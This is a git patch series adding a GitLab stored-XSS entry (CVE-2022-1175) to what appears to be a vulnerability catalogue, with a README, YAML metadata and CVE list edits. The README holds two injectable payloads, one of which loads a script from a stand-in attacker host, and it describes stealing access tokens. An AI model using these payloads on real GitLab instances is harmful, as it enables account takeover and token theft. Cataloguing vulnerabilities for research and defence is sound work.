From 1c07655c168b0687b5fc25646c597f4fe24f3d9d Mon Sep 17 00:00:00 2001
From: SipengXie <sipengxie@buaa.edu.cn>
Date: Fri, 7 Apr 2023 18:24:25 +0800
Subject: [PATCH 1/4] Add CVE-2022-1175

---
 cve/gitlab/2022/CVE-2022-1175/README.md | 14 ++++++++++++++
 cve/gitlab/2022/yaml/CVE-2022-1175.yaml | 24 ++++++++++++++++++++++++
 2 files changed, 38 insertions(+)
 create mode 100644 cve/gitlab/2022/CVE-2022-1175/README.md
 create mode 100644 cve/gitlab/2022/yaml/CVE-2022-1175.yaml

diff --git a/cve/gitlab/2022/CVE-2022-1175/README.md b/cve/gitlab/2022/CVE-2022-1175/README.md
new file mode 100644
index 00000000..73862290
--- /dev/null
+++ b/cve/gitlab/2022/CVE-2022-1175/README.md
@@ -0,0 +1,14 @@
+
+# CVE-2022-1175
+
+Gitlab Stored XSS, can be set in an issue on a project, either your own or another users. Allows attacks such as creating & stealing a Personal Access Token (PAT) of anyone who visits an issue. PAT's can then provide full Gitlab API access as that user equivilent to a full account takeover. 
+
+Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.
+
+```<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>```
+Standard script include also works depending on the sites CSP policy. This is more stealthy.
+```<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>```
+GitLab devs handily included the full XSS string in the code which can be found here:
+https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4
+*Reference:*
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175
diff --git a/cve/gitlab/2022/yaml/CVE-2022-1175.yaml b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml
new file mode 100644
index 00000000..a0c085bb
--- /dev/null
+++ b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml
@@ -0,0 +1,24 @@
+id: CVE-2022-1175
+source: https://github.com/Greenwolf/CVE-2022-1175
+info:
+  name: Gitlab XSS存储
+  severity: high
+  description: |
+    - Gitlab CE/EE版本中用户输入的不当处理允许攻击者通过注入Notes中的HTML来利用XSS。
+  scope-of-influence:
+    GitLab CE/EE 14.4.x < 14.7.7
+    GitLab CE/EE 14.8.x < 14.8.5
+    GitLab CE/EE 14.9.x < 14.9.2
+  reference:
+    - http://packetstormsecurity.com/files/166829/Gitlab-14.9-Cross-Site-Scripting.html
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1175.json
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/353370
+    - https://hackerone.com/reports/1481207
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
+    cvss-score: 8.7
+    cve-id: CVE-2022-1175
+    cwe-id: CWE-79
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, gitlab
\ No newline at end of file
-- 
Gitee


From 043bdb0bb1fa9b277139e702af69685a18b583a2 Mon Sep 17 00:00:00 2001
From: SipengXie <sipengxie@buaa.edu.cn>
Date: Mon, 10 Apr 2023 14:46:35 +0800
Subject: [PATCH 2/4] update CVE-2022-1175.yaml

---
 cve/gitlab/2022/yaml/CVE-2022-1175.yaml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/cve/gitlab/2022/yaml/CVE-2022-1175.yaml b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml
index a0c085bb..e00dec60 100644
--- a/cve/gitlab/2022/yaml/CVE-2022-1175.yaml
+++ b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml
@@ -1,10 +1,10 @@
 id: CVE-2022-1175
 source: https://github.com/Greenwolf/CVE-2022-1175
 info:
-  name: Gitlab XSS存储
-  severity: high
+  name: GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。
+  severity: medium
   description: |
-    - Gitlab CE/EE版本中用户输入的不当处理允许攻击者通过注入Notes中的HTML来利用XSS。
+    Gitlab CE/EE版本中用户输入的不当处理允许攻击者通过注入Notes中的HTML来利用XSS。
   scope-of-influence:
     GitLab CE/EE 14.4.x < 14.7.7
     GitLab CE/EE 14.8.x < 14.8.5
@@ -15,8 +15,8 @@ info:
     - https://gitlab.com/gitlab-org/gitlab/-/issues/353370
     - https://hackerone.com/reports/1481207
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
-    cvss-score: 8.7
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2022-1175
     cwe-id: CWE-79
     cnvd-id: None
-- 
Gitee


From b8de81aa53e0fb3297c5a0d11d356b30954b6ab9 Mon Sep 17 00:00:00 2001
From: SipengXie <sipengxie@buaa.edu.cn>
Date: Tue, 11 Apr 2023 17:54:08 +0800
Subject: [PATCH 3/4] update other_list: add gitlab:cve-2022-1175

---
 other_list.yaml | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/other_list.yaml b/other_list.yaml
index c9f163e3..d18f974b 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -1,6 +1,7 @@
 #此收录漏洞列表为非openKylin发行版用例。
 cve: 
   linux-kernel:
+    - CVE-2017-1000112
     - CVE-2019-16884
     - CVE-2021-33909
     - CVE-2021-3493
@@ -12,6 +13,8 @@ cve:
     - CVE-2021-33624
     - CVE-2020-27194
     - CVE-2023-0179
+    - CVE-2018-18955
+    - CVE-2011-4917
   polkit:
     - CVE-2021-3560
   Outlook:
@@ -33,6 +36,8 @@ cve:
     - CVE-2022-22978
   apache-commons-text:
     - CVE-2022-42889
+  apache-Struts:
+    - CVE-2018-11776
   unzip:
     - CVE-2022-0529
   django:
@@ -41,7 +46,7 @@ cve:
     - CVE-2019-14287
   MinIO:
     - CVE-2023-28432
-  WebLogic：
+  WebLogic:
     - CVE-2023-21839
   Node.js:
     - CVE-2021-21315
@@ -49,7 +54,12 @@ cve:
     - CVE-2022-23131
   weblogic:
     - CVE-2022-2555
+    - CVE-2021-2109
   Zyxel:
     - CVE-2022-30525
+  WordPress:
+    - CVE-2019-8942
+  Gitlab:
+    - CVE-2022-1175
 cnvd:
 
-- 
Gitee


From c1c0bb112cac845ed183fe42d8cc95dab70adbe4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E8=B0=A2=E6=80=9D=E8=8A=83?= <sipengxie@buaa.edu.cn>
Date: Mon, 17 Apr 2023 04:40:51 +0000
Subject: [PATCH 4/4] =?UTF-8?q?=E4=BF=AE=E6=94=B9other=5Flist.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 谢思芃 <sipengxie@buaa.edu.cn>
---
 other_list.yaml | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/other_list.yaml b/other_list.yaml
index d18f974b..d7a7ccb8 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -1,7 +1,6 @@
 #此收录漏洞列表为非openKylin发行版用例。
 cve: 
   linux-kernel:
-    - CVE-2017-1000112
     - CVE-2019-16884
     - CVE-2021-33909
     - CVE-2021-3493
@@ -13,8 +12,6 @@ cve:
     - CVE-2021-33624
     - CVE-2020-27194
     - CVE-2023-0179
-    - CVE-2018-18955
-    - CVE-2011-4917
   polkit:
     - CVE-2021-3560
   Outlook:
@@ -36,8 +33,6 @@ cve:
     - CVE-2022-22978
   apache-commons-text:
     - CVE-2022-42889
-  apache-Struts:
-    - CVE-2018-11776
   unzip:
     - CVE-2022-0529
   django:
@@ -46,7 +41,7 @@ cve:
     - CVE-2019-14287
   MinIO:
     - CVE-2023-28432
-  WebLogic:
+  WebLogic：
     - CVE-2023-21839
   Node.js:
     - CVE-2021-21315
@@ -54,12 +49,8 @@ cve:
     - CVE-2022-23131
   weblogic:
     - CVE-2022-2555
-    - CVE-2021-2109
   Zyxel:
     - CVE-2022-30525
-  WordPress:
-    - CVE-2019-8942
   Gitlab:
     - CVE-2022-1175
-cnvd:
-
+cnvd:
\ No newline at end of file
-- 
Gitee